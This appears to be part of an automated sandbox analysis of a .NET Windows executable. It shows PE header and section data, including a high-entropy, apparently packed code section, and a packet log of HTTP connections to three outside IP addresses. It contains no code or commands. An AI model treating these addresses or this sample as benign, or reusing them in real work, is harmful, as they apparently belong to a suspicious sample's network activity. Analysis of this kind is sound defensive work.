                                                    Time Stamp:0xC29198FE [Sat Jun 10 12:03:10 2073 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xaaf6f | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xac000 | 0x5bc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xae000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa9908 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa8fc8 | 0xa9000 | 218397325eb92010b70ead0eab018cb4 | False | 0.9420057669193787 | data | 7.879696863228832 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xac000 | 0x5bc | 0x600 | 219465ccd13ac264281b8dc526c0f1aa | False | 0.421875 | data | 4.107203732502543 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xae000 | 0xc | 0x200 | 33a1ab43d87f217824f4a02dc00b4541 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xac090 | 0x32c | data | | | 0.4273399014778325
RT_MANIFEST | 0xac3cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 9, 2024 14:01:59.869179010 CEST | 49980 | 80 | 192.168.2.9 | 81.2.196.19
Oct 9, 2024 14:01:59.874217033 CEST | 80 | 49980 | 81.2.196.19 | 192.168.2.9
Oct 9, 2024 14:01:59.874310970 CEST | 49980 | 80 | 192.168.2.9 | 81.2.196.19
Oct 9, 2024 14:01:59.885922909 CEST | 49980 | 80 | 192.168.2.9 | 81.2.196.19
Oct 9, 2024 14:01:59.890758038 CEST | 80 | 49980 | 81.2.196.19 | 192.168.2.9
Oct 9, 2024 14:02:00.547663927 CEST | 80 | 49980 | 81.2.196.19 | 192.168.2.9
Oct 9, 2024 14:02:00.547756910 CEST | 80 | 49980 | 81.2.196.19 | 192.168.2.9
Oct 9, 2024 14:02:00.548069000 CEST | 49980 | 80 | 192.168.2.9 | 81.2.196.19
Oct 9, 2024 14:02:00.552664995 CEST | 49980 | 80 | 192.168.2.9 | 81.2.196.19
Oct 9, 2024 14:02:00.557549000 CEST | 80 | 49980 | 81.2.196.19 | 192.168.2.9
Oct 9, 2024 14:02:15.678764105 CEST | 49981 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:15.683821917 CEST | 80 | 49981 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:15.683918953 CEST | 49981 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:15.698322058 CEST | 49981 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:15.704651117 CEST | 80 | 49981 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:16.350398064 CEST | 80 | 49981 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:16.351197958 CEST | 80 | 49981 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:16.351267099 CEST | 49981 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:17.214054108 CEST | 49981 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:18.232841015 CEST | 49982 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:18.237804890 CEST | 80 | 49982 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:18.237922907 CEST | 49982 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:18.249644041 CEST | 49982 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:18.254532099 CEST | 80 | 49982 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:18.896882057 CEST | 80 | 49982 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:18.896910906 CEST | 80 | 49982 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:18.897203922 CEST | 49982 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:19.760979891 CEST | 49982 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:20.779750109 CEST | 49983 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:20.784775019 CEST | 80 | 49983 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:20.784900904 CEST | 49983 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:20.795475006 CEST | 49983 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:20.800617933 CEST | 80 | 49983 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:20.800767899 CEST | 80 | 49983 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:21.471190929 CEST | 80 | 49983 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:21.471543074 CEST | 80 | 49983 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:21.471616030 CEST | 49983 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:22.307732105 CEST | 49983 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:23.326504946 CEST | 49984 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:23.332523108 CEST | 80 | 49984 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:23.332628012 CEST | 49984 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:23.339941025 CEST | 49984 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:23.344850063 CEST | 80 | 49984 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:23.989788055 CEST | 80 | 49984 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:23.989862919 CEST | 80 | 49984 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:23.989964962 CEST | 49984 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:23.992594004 CEST | 49984 | 80 | 192.168.2.9 | 65.21.196.90
Oct 9, 2024 14:02:23.997787952 CEST | 80 | 49984 | 65.21.196.90 | 192.168.2.9
Oct 9, 2024 14:02:29.165656090 CEST | 49985 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:29.170783043 CEST | 80 | 49985 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:29.171057940 CEST | 49985 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:29.183646917 CEST | 49985 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:29.188823938 CEST | 80 | 49985 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:30.698379993 CEST | 49985 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:30.795749903 CEST | 80 | 49985 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:30.795877934 CEST | 49985 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:31.717153072 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:31.722170115 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:31.722280025 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:31.733153105 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:31.738042116 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.063723087 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.064151049 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.064183950 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.064189911 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.064203024 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.064241886 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.083913088 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.083950996 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.083964109 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.083996058 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.084068060 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.084079981 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.084090948 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.084112883 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.084137917 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.084295034 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.084309101 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.084321022 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.084340096 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.135941982 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.151124001 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.151164055 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.151175022 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.151246071 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.151257992 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.151269913 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.151423931 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.151438951 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.151487112 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.171014071 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.171041012 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.171052933 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.171063900 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.171077967 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.171176910 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.171226978 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.171226978 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.171272993 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.171284914 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.171319962 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.171421051 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.171432972 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.171472073 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.172147989 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.172158957 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.172169924 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.172194958 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.172261000 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.172272921 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.172305107 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.173144102 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.173192978 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.173274994 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.214041948 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.237853050 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.237898111 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.237910032 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.237946987 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.237958908 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.237972021 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.237996101 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.238032103 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.238409996 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.238456964 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.238470078 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.238507986 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.238604069 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.238615990 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.238626957 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.238662958 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.238679886 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.239327908 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.239907980 CEST | 80 | 49986 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:33.239957094 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:33.245345116 CEST | 49986 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:34.265245914 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:34.270163059 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:34.270308018 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:34.282876015 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:34.287844896 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:34.287997961 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.483587980 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.483954906 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.484019041 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.484050035 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.484061956 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.484136105 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.498430014 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.498462915 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.498478889 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.498543024 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.498645067 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.498660088 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.498675108 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.498689890 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.498699903 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.498706102 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.498728037 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.498753071 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.498944044 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.498956919 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.498997927 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.571532011 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.571598053 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.571634054 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.571724892 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.571774960 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.571870089 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.571870089 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.586078882 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.586148024 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.586183071 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.586302042 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.586335897 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.586405993 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.586472988 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.586518049 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.586519957 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.586553097 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.586580992 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.586662054 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.586714029 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.586740971 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.587362051 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.587415934 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.587433100 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.587466955 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.587512016 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.587532043 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.587598085 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.587641954 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.588264942 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.588318110 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.588351011 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.588366985 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.588423967 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.588470936 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.658930063 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.658998966 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.659049988 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.659085035 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.659120083 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.659184933 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.659292936 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.686826944 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.686852932 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.686868906 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.686892986 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.686908960 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.686923027 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.686938047 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.686935902 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.686952114 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.686966896 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.686970949 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.686983109 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.687004089 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.687014103 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.687208891 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.687225103 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.687238932 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
Oct 9, 2024 14:02:35.687247992 CEST | 49987 | 80 | 192.168.2.9 | 44.213.25.70
Oct 9, 2024 14:02:35.687252998 CEST | 80 | 49987 | 44.213.25.70 | 192.168.2.9
                                                    Oct 9, 2024 14:02:35.687268972 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.687278032 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.687308073 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.691463947 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691490889 CEST804998744.213.25.70192.168.2.9
